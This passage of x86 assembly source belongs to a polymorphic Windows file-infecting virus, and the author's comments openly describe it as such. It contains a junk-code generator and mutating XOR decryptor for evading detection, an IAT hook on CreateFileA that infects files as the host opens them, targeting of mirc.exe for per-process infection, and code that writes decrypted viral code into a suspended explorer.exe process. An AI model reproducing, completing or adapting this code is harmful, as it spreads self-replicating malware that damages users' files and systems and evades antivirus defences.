mov al,byte ptr [ebp + random1] and eax,0Fh ;;;;;;;;;;;; Trash0: or eax,eax jnz Trash1 cmp ecx,4 jge ok0 callz trash ret ok0: ;xor esireg,ecxreg ;33h -> ins code + 11xxxyyyb -> registers ;more trash ;xor esireg,ecxreg ;undo changes sub ecx,4 mov eax,[ebp + esireg] mov ebx,[ebp + ecxreg] mov dl,0C0h rol al,3 or dl,al or dl,bl mov al,33h stosb mov al,dl stosb push edx callz trash pop edx mov al,33h stosb mov al,dl stosb ret ;;;;;;;;;;;; Trash1: dec eax or eax,eax jnz Trash2 cmp ecx,6 jge ok1 callz trash ret ok1: ;push esireg ;push ecxreg ;push xx ;more trash ;pop xx ;pop ecxreg ;pop esireg sub ecx,6 mov eax,[ebp + esireg] mov ebx,[ebp + ecxreg] mov dl,[ebp + random2] and dl,7 add al,50h add bl,50h add dl,50h push eax push ebx push edx stosb mov al,bl stosb mov al,dl stosb callz trash pop eax add eax,8 stosb pop eax add eax,8 stosb pop eax add eax,8 stosb ret ;;;;;;;;;;;; Trash2: dec eax or eax,eax jnz Trash3 mov al,90h;nop stosb dec ecx callz trash ret ;;;;;;;;;;;; Trash3: dec eax or eax,eax jnz Trash4 mov al,0F9h;stc stosb dec ecx callz trash ret ;;;;;;;;;;;; Trash4: dec eax or eax,eax jnz Trash5 mov al,0F8h;clc stosb dec ecx callz trash ret ;;;;;;;;;;;; Trash5: dec eax or eax,eax jnz Trash6 mov al,0F5h;cmc stosb dec ecx callz trash ret ;;;;;;;;;;;; Trash6: dec eax or eax,eax jnz Trash7 cmp ecx,2 jge ok6 callz trash ret ok6: mov eax,[ebp + esireg] add al,40h stosb dec ecx dec ecx callz trash mov eax,[ebp + esireg] add al,48h stosb ret ;;;;;;;;;;;; Trash7: dec eax or eax,eax jnz Trash8 mov al,90h;0FAh;cli ;damn damn damn in NT cli is privileged :'( stosb dec ecx callz trash ret ;;;;;;;;;;;; Trash8: dec eax or eax,eax jnz Trash9 cmp ecx,6 jge ok8 callz trash ret ok8: sub ecx,6 mov al,0C1h stosb mov al,0C0h mov ebx,[ebp + ecxreg] or al,bl stosb mov al,byte ptr[ebp + random2] stosb push eax callz trash mov al,0C1h stosb mov al,0C8h mov ebx,[ebp + ecxreg] or al,bl stosb pop eax stosb ret ;;;;;;;;;;;; ;;;;;;;;;;;; Trash9: dec eax or eax,eax jnz TrashA cmp [ebp + esireg],0 je nook9 cmp [ebp + ecxreg],0 je nook9 mov al,0d6h; SALC stosb dec ecx nook9: callz trash ret ;;;;;;;;;;;; ;;;;;;;;;;;; TrashA: dec eax or eax,eax jnz TrashB cmp ecx,2 jge okA callz trash ret okA: xor eax,eax mov al,[ebp + random3] cmp eax,[ebp + esireg];no ecxreg je nookA cmp eax,[ebp + ecxreg];no esireg je nookA cmp al,4;no esp je nookA or al,al;no eax becoz opcode is different becoz some instruct. are optimizated for eax. jz nookA mov bl,[ebp + random2] and ebx,7 push eax mov al,byte ptr[ebp + ebx + opcodesA] stosb pop eax mov bl,[ebp + random1] rol bl,cl and bl,7 rol al,3 or al,0C0h or al,bl stosb dec ecx dec ecx callz trash ret nookA: callz trash ret opcodesA: db 2bh;sub db 1bh;sbb db 13h;adc db 03h;add db 23h;and db 3bh;cmp db 8bh;mov db 0bh;or db 85h;test ;;;;;;;;;;;; ;;;;;;;;;;;; TrashB: ;nothing,only call trash again callz trash NoTrash: ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; randomize:;a pseudorandom number generator...its a few bad :P i could have searched something ;about random generators but i was tired in that moment ;P so i coded this short ;and not very efficient function...however i like it :-m mov ecx,0001FFFFh WaitAFew: nop loop WaitAFew mov eax,[ebp + kernel] GezApi eax,GetTickCountCRC,GTCNameLen call eax mov byte ptr [ebp + random1],al mov ecx,[ebp + CryptKey] rol eax,cl mov byte ptr [ebp + random2],al mov ecx,[ebp + CryptKey] rol eax,cl and eax,7 mov byte ptr [ebp + random3],al ret random1 db 0 random2 db 0 random3 db 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;all this functions receive as parameter edi pointing to code where we must write polimorphed ;code and return edi pointing to next byte where we have writed ;for now,for useful instructions of decryptor,only is changed the used registers,intruction ;is not changed by other. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zpop poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zpop: mov eax,[ebp + esireg] add al,58h stosb ret A1: A2: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zadd poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zadd: mov eax,[ebp + esireg] or eax,eax jnz noeaxreg lea esi,[ebp + B2] mov ecx,B3 - B2 rep movsb ret noeaxreg: lea esi,[ebp + B1] mov bl,byte ptr [ebp + B1 + 1] and bl,0F8h or bl,al mov byte ptr [ebp + B1 + 1],bl mov ecx,B2 - B1 rep movsb ret B1: add esi,Encrypted - DkRyPtIt B2: add eax,Encrypted - DkRyPtIt B3: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zmov poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zmov: mov eax,[ebp + ecxreg] lea esi,[ebp + C1] add byte ptr [esi],al mov ecx,C2 - C1 rep movsb mov byte ptr [ebp + C1],0B8h ret C1: mov eax,((EVirus - Encrypted)/4) C2: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zxor poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zxor: lea esi,[ebp + D2 - 4] mov ecx,[ebp + CryptKey] mov [esi],ecx mov cl,byte ptr [esi - 2] mov eax,[ebp + ecxreg] mov ebx,[ebp + esireg] rol eax,3 or al,bl and cl,0C0h or al,cl mov byte ptr [esi - 2],al lea esi,[ebp + D1] mov ecx,D2 - D1 rep movsb ret D1: xor dword ptr [eax + edx*4 - 4],12345678h ;81h 74h (important byte) FCh KEY ;we must change registers in the important byte D2: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zdec poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zdec: mov eax,[ebp + ecxreg] add al,48h stosb ret E1: E2: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;zor poly ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; zor: mov ecx,[ebp + ecxreg] mov eax,ecx rol eax,3 or al,cl or al,0C0h mov byte ptr [ebp + F1 + 1],al lea esi,[ebp + F1] mov ecx,F2 - F1 rep movsb ret F1: or ecx,ecx F2: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;HookCreateFileA hooks CreateFileA api for current host and when host call CreateFileA ;then hook-code take control and infect the file than is passed to CreateFileA as parameter. ; ; ;in: ; eax = kernel ;out: ; none ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; HookCreateFileA: pushad mov dword ptr [ebp + kernel],eax GezApi eax,GetModuleHandleACRC,GMHNameLen push 0 call eax ;eax = this module mov edx,[eax + 3ch] add edx,eax mov edx,[edx + 80h];IAT add edx,eax mov ebx,eax ;edx -> IAT ;ebx -> MZ sub edx,14h SearchInIAT: add edx,14h mov esi,[edx + 0ch];name of dll or esi,esi jz endHook;if last and no found then we go out...however its very unprobable program doesnt ;import no functions from kernel add esi,ebx mov ecx,8 lea edi,[ebp + kernelBuf] rep movsb mov ecx,8 toLower: dec edi or byte ptr [edi],20h ;becoz i have CRC of 'kernel32' string and ill search with CRC loop toLower mov esi,edi mov edi,8 push edx push ebx call CRC32 pop ebx pop edx cmp eax,Kernel32CRC jne SearchInIAT ;edx = kernel entry in IAT push edx mov edx,[edx] add edx,ebx ;edx = array of names of kernel32 push edx sub edx,4 SearchCreateFileA: add edx,4 mov esi,[edx];name of api or esi,esi jz endHookWithPop ;if last and no found CreateFileA we go out add esi,ebx inc esi inc esi CalcLenString ;esi -> name ;ecx = len mov edi,ecx push edx push ebx call CRC32 ;i search CreateFile by CRC too pop ebx pop edx cmp eax,CreateFileACRC jne SearchCreateFileA pop ecx;start of array sub edx,ecx pop eax mov eax,[eax + 10h] add eax,edx add eax,ebx ;dword ptr [eax] = dir of CreateFileA ;we must overwrite this dir with our hook rutine ;) ;i think that unprotect mem its not necessary becoz loader must write that dir ;however ill unprotect it push eax mov esi,eax mov eax,[ebp + kernel] mov ecx,4 xor ebx,ebx callz UnprotectMem pop eax lea esi,[ebp + HookRutine] mov dword ptr [eax],esi ;i put over CreateFileA dir my hook rutine dir ;) mov eax,[ebp + kernel] GezApi eax,CreateFileACRC,CFNameLen mov [ebp + CreateFileADir],eax ;ill need in hook rutine mov eax,[ebp + kernel] GezApi eax,FindFirstFileACRC,FFFNameLen mov [ebp + FindFirstFileADir],eax ;ill need it in hook rutine and i wanna be fast so ill ;calc it here and i keep it jmpz endHook endHookWithPop: pop eax endHook: popad ret kernelBuf db 8 dup (?) HookRutine: push eax pushad pushfd callz HookdOff HookdOff: pop ebp sub ebp,offset HookdOff mov eax,[ebp + CreateFileADir] mov [esp + 24h],eax ;for next ret jumps CreateFileA mov eax,[esp + 2Ch];file lea ebx,[ebp + WIN32_FIND_DATA] push ebx push eax call dword ptr [ebp + FindFirstFileADir] xor eax,eax inc eax ;callz InfectIt popfd popad ret;i have push eax but later i have change [esp + 24h] to CreateFileA dir so ;with a ret program will jmp to CreateFileA ;) CreateFileADir dd 0 FindFirstFileADir dd 0 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;TestFile will test WIN32_FIND_DATA to see if current file found is mirc.exe or other ;typical irc programs and later infect them with per-process characteristic. ;In addition it tests if file is explorer.exe for not infection. ; ;in:none ; ;out: eax = 1 infect with per-process / eax = 0 not necesary perprocess / eax = -1 no infect ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; TestFile: ;When i began to code perprocess part i though to search recursively some programs ;in hard disk(mirc.exe,messenger and others) for infecting it with perprocess,but finally ;i decide if i found some of that programs,then i infect them with perprocess but i ;dont search them.I think if i infect some specific programs with perprocess for ;increasing infection capability im not coding a worm,however if i search programs for ;modifing them for virus was sent by irc or mail or other,then im coding a worm.This is ;only a mania,i dont want my virus was a worm :P,only that. mircCRC equ 7c55758dh ; CRC of 'mirc.exe' explorerCRC equ 0be037055h ; CRC of 'explorer.exe' lea esi,[ebp + WFD_szFileName] CalcLenString push ecx add ecx,esi push esi dec esi ToLowerFileName: inc esi cmp esi,ecx je EndToLower cmp byte ptr [esi],'A' jb ToLowerFileName cmp byte ptr [esi],'Z' jg ToLowerFileName or byte ptr [esi],20h jmp ToLowerFileName EndToLower: pop esi pop edi callz CRC32 ;eax = CRC of file name cmp eax,mircCRC je retPerProcess cmp eax,explorerCRC je retNoInfect xor eax,eax ret retPerProcess: xor eax,eax inc eax ret retNoInfect: xor eax,eax dec eax ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Pad: PADDING equ 4 -(((Pad - SCode) - (4*((Pad - SCode)/4)))) db PADDING dup (0) ;code size its a multiple of 4 becoz encryption reasons. ECode: ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; MyEntryPoint: ;HERE EXECUTION BEGINS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ;vvvvvvvvvvvvvvvvvvpolymorphed callz DkRyPtIt DkRyPtIt: pop esi add esi,Encrypted - DkRyPtIt mov ecx,((EVirus - Encrypted)/4) GoGoGo: xor dword ptr [esi + ecx*4 - 4],12345678h dec ecx or ecx,ecx jnz GoGoGo endDKR: PADDKR equ 200 - (endDKR - MyEntryPoint) db PADDKR dup (90h) ;dekryptor has always 200 bytes :'( ;^^^^^^^^^^^^^^^^^^polymorphed Encrypted: call d_offset d_offset: pop ebp sub ebp,offset d_offset pop eax push eax xor ax,ax add eax,1000h ;eax -> a part of kernel32 SearchKernel: sub eax,1000h cmp word ptr [eax],'ZM' jne SearchKernel ;callz DetectSICE push eax callz InjectToExplorer ;ill run other part of code in explorer.exe pop eax pushad mov ebx,dword ptr [ebp + SCode] cmp ebx,000000E8h jne NoHook ;if part of explorer injected code its uncrypted before copying it to explorer then ;we can hook CreateFileA api ;) callz HookCreateFileA NoHook: popad pushad callz NTInvasion ;/ popad EndFirstPart: cmp dword ptr [ebp + OldEntryPoint],0 je endit ;here we restore EPO bytes and jmp there push eax GezApi eax,GetModuleHandleACRC,GMHNameLen push 0 call eax mov ebx,eax pop eax mov esi,[ebp + OldEntryPoint] add esi,ebx push esi mov ecx,EPOCodeSize xor ebx,ebx callz UnprotectMem pop esi mov edi,esi push esi lea esi,[ebp + EPORestoreBytes] mov ecx,EPOCodeSize rep movsb pop esi jmp esi endit: ;only first gen...in second we return to host push 0 call ExitProcess ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; OldEntryPoint dd 0 EPORestoreBytes db EPOCodeSize dup(0) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;Loads and injects to explorer the viral code and execute it. ;in: ; eax = Base Kernel ;out: ; none ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; InjectToExplorer:;only in 9x mov ecx,cs xor cl,cl or ecx,ecx jne ContinueInjecting ret ContinueInjecting: push eax;we save kernel base ;now ill create a new process but stopped...createprocess has a option ;to create the process stopped and you can to force it to continue later.So ill ;create this new process and after ill infect in memory it with this code but ;uncryting encrypted parts. callz LoadExplorer9x ; eax = handle to process ; ebx = process ID ; ecx = offset of primary module(.exe module) ; edx = size of module in bytes ; esi = primary thread handle ; edi = primary thread ID pushad mov ebx,eax ;handle of process mov eax,[esp + 32] ;base of kernel mov esi,ecx ;offset of module mov ecx,edx ;size of module ;now we unprotect new process mem callz UnprotectMem ;esp -> threadID/+4 hThread/+16 processID/+20 sizeMod/+24 offMod/+28 hProcess/+32 KernelBase ;now i must search entry point of new process ;Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size mov eax,[esp + 32];BaseKernel mov ebx,[esp + 28];hProcess mov ecx,[esp + 24];OffsetInProc add ecx,3ch ;for reading lfanew push 0 ;space for reading lfanew value mov edx,esp ;Buffer pushad Readz eax,ebx,ecx,edx,4 popad pop esi ;lfanew sub ecx,3ch add ecx,esi ;lfanew + module add ecx,28h ;lfanew + module + 28h for reading entryPoint push 0 ;space for reading lfanew value mov edx,esp ;Buffer pushad Readz eax,ebx,ecx,edx,4 popad pop edi mov ecx,[esp + 24];OffsetInProc add edi,ecx ;edi = entryPoint in module in new process ;we encrypted Code with random key since FFFF0000h to FFFFFFFFh so ;now we must search the key using brute force xor ecx,ecx mov edx,dword ptr [ebp + SCode] WhatKey: xor edx,ecx cmp edx,000000E8h je KeyFound xor edx,ecx loop WhatKey KeyFound: mov edx,ecx ;edx = key lea esi,[ebp + SCode] mov ecx,((ECode - SCode)/4) ;and now we will write the code to new process uncrypting it while WriteCode: pushad push dword ptr [esi] xor dword ptr [esp],edx mov esi,esp Writez eax,ebx,edi,esi,4 pop esi popad add esi,4 add edi,4 loop WriteCode sub esi,ebp cmp esi,offset EVirus je CodeCopied add esi,ebp mov ecx,((EVirus - ECode)/4) xor edx,edx jmpz WriteCode CodeCopied: ;here we must have copied all code and now we must start execution of thread ;esp -> threadID/+4 hThread/+16 processID/+20 sizeMod/+24 offMod/+28 hProcess/+32 KernelBase mov eax,[esp + 32] GezApi eax,ResumeThreadCRC,RTNameLen ;eax -> ResumeThread push dword ptr [esp + 4];Thread Handle call eax add esp,32 pop eax ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;UnprotectMem sets as writable zone since esi to esi + ecx in ebx process. ;in: ; eax -> base of kernel ; esi -> dir of memory that will be writable. ; ecx -> bytes of that memory. ; ebx -> handle of the process where is the memory.If 0 this process ; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; UnprotectMem: or ebx,ebx jne NoThisProcess push eax push esi push ecx GezApi eax,GetCurrentProcessCRC,GCPNameLen ;eax -> GetCurrentProcess call eax ;eax = hand of this process mov ebx,eax pop ecx pop esi pop eax NoThisProcess: push ebx push esi push ecx GezApi eax,VirtualProtectExCRC,VPNameLen ;eax -> VirtualProtectEx pop ecx pop esi pop ebx ;ebx = hand of process ;esi = dir ;ecx = nbytes push eax ;space for receiving lpflOldProtect out parameter push esp push PAGE_EXECUTE_READWRITE push ecx push esi push ebx call eax pop eax ;we remove space that we reserve in the stack for out parameter ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;CRC32 rutine(from Billy Belcebu tutorial)...i have not said him nothing about i have take ;his rutine but i dont know him...in addition i have seen this rutine in other viruses ;so i think he doesnt go angry if i use it :) ; ;in:esi -> start of buffer ; edi = size of buffer ;out: ; eax = cksum ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; CRC32: cld xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0EDB8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jnz NextByteCRC not edx not ecx mov eax,edx rol eax,16 mov ax,cx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;GetApi gets a api address from its crc. ;in: ; eax -> base of dll ; edx = the crc32 of api to search. ; ebx = api name len. ;out: ; eax -> function ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetApi: ;eax -> base of dll ;ebx = len api name ;edx = crc of api name push ebx ecx edx esi edi push eax mov eax,[eax + 3ch] add eax,dword ptr [esp] ;eax -> PE mov eax,[eax + 78h] add eax,dword ptr [esp] ;eax -> Export table push eax push ebx mov ebx,[eax + 20h] add ebx,dword ptr [esp + 8] ;ebx -> Name of functions push ebx sub ebx,4 SearchApiByCRC: add ebx,4 mov esi,[ebx] add esi,dword ptr [esp + 12] CalcLenString ;ecx = length api.name mov edi,[esp + 4] cmp edi,ecx jne SearchApiByCRC mov edi,ecx push ebx push edx callz CRC32 pop edx pop ebx cmp eax,edx jne SearchApiByCRC pop edi ;edi -> name of functions ;ebx -> name of functions + (index of our api * 4) sub ebx,edi mov eax,ebx xor edx,edx mov ebx,4 div ebx ;eax = index of our api pop ebx pop ebx ;ebx -> export mov ecx,[ebx + 24h] add ecx,dword ptr [esp] ;ecx -> name ordinals rol eax,1 add ecx,eax mov ecx,[ecx] shr ecx,10h dec ecx ;ecx = ordinal mov eax,[ebx + 1ch] add eax,dword ptr [esp] ;eax -> address of functions rol ecx,2 add eax,ecx mov eax,[eax] add eax,dword ptr [esp] ;eax = address of function searched pop ebx pop edi edi edx ecx ebx ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;LoadExplorer9x creates a new process suspended with explorer.exe in 9x ; ;I learned how to use ToolHelp32 and psapi thx to Win32.Dengue so i must say thx to GriYo :) ;I havent copied code! ... i have read it and i have learned from it :) ; ;in: ; eax = base of kernel ;out: ; eax = handle to process ; ebx = process ID ; ecx = offset of primary module(.exe module) ; edx = size of module in bytes ; esi = primary thread handle ; edi = primary thread ID ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; LoadExplorer9x: ;Note that though we create a process ;from a module from windows directory we specify to CreateProcess that ;working directory is same than calling process,this process,so we can search ;here a file to infect it. push eax ;kernel base saved sub esp,200 mov esi,esp callz GetExplorer ;ecx = number of read bytes push ecx ;we save it mov eax,dword ptr [esp + 204];eax = base kernel GezApi eax,CreateProcessACRC,CPNameLen ;eax -> CreateProcessA mov ecx,(STARTUPINFOSIZE + PROCESSINFORMATIONSIZE)/4 xor edx,edx SaveSpace9x: push edx loop SaveSpace9x ;esp -> Process Information structure ;esp + PROCESSINFORMATIONSIZE -> startupinfo structure ;[esp + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] = len of name of module ;esp + 4 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE -> name of module ;[esp + 204 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] = base of kernel mov dword ptr [esp + PROCESSINFORMATIONSIZE],64;size of startupinfo mov edx,esp push edx;process information add edx,PROCESSINFORMATIONSIZE push edx;startupinfo push 0 push 0 push CREATE_SUSPENDED or CREATE_NEW_PROCESS_GROUP push 0 push 0 push 0 push 0 add edx,4 + STARTUPINFOSIZE push edx;name of module call eax;CreateProcessA ;we have created the suspended process ;[esp] = handle to new process ;[esp + 4] = handle to primary thread(suspended) ;[esp + 8] = Id of process ;[esp + 12] = Id of thread ;now i must search the primary module of the process. mov eax,[esp + 204 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] ;eax = base of kernel GezApi eax,CreateToolhelp32SnapShotCRC,CT32SNameLen ;eax -> CreateToolhelp32Snapshot mov ebx,[esp + 8] ;ebx = handle to process push ebx push TH32CS_SNAPMODULE call eax ;eax = snapshot ;we have create the snapshot and now we will search the module that we need. sub esp,548 ;we will reserve space for MODULEENTRY32 mov dword ptr[esp],548 ;sizeof MODULEENTRY32 mov ecx,eax ;ecx = snapshot mov [esp + 548 + PROCESSINFORMATIONSIZE + SNAPSHOT],ecx;we save it mov eax,[esp + 548 + 4 + 200 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE] ;eax = base of kernel push eax GezApi eax,Module32FirstCRC,M32FNameLen mov edx,esp add edx,4 push edx push ecx call eax pop eax GezApi eax,Module32NextCRC,M32NNameLen ;eax -> Module32Next mov [esp + 548 + PROCESSINFORMATIONSIZE],eax ;we save it NextModule: ;esp + 32 + 256 -> name of module with path(becoz GetModuleFileName gives entire path) mov esi,esp add esi,32 + 256 CalcLenString mov edi,ecx call CRC32 ;eax = CRC of name of module we have got push eax mov edi,[esp + 548 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE + 4] mov esi,esp add esi,548 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE + 4 + 4 call CRC32 ;eax = CRC of our module pop edx cmp edx,eax je FoundModule push esp mov ecx,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + SNAPSHOT];we recover snapshot push ecx mov eax,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + 4] ;eax -> Module32Next call eax jmp NextModule FoundModule: ;yeah!!!! ;) mov eax,[esp + 548 + 4 + 200 + STARTUPINFOSIZE + PROCESSINFORMATIONSIZE];base kernel GezApi eax,CloseHandleCRC,CHNameLen mov ecx,[esp + 548 + PROCESSINFORMATIONSIZE + 4 + SNAPSHOT];we recover snapshot push ecx call eax ;snapshot closed ;now we recover information for returning parameters and ret ;) mov ecx,[esp + 20] mov edx,[esp + 24] mov eax,[esp + 548] mov esi,[esp + 548 + 4] mov ebx,[esp + 548 + 8] mov edi,[esp + 548 + 12] add esp,548 + 16 + 68 + 4 + 200 + 4 ret ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ; ;GetExplorer ;In: ; eax = base of kernel ; esi -> buffer for storing name ;Out: ; esi ->buffer ; ecx = bytes of name ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; GetExplorer: push esi 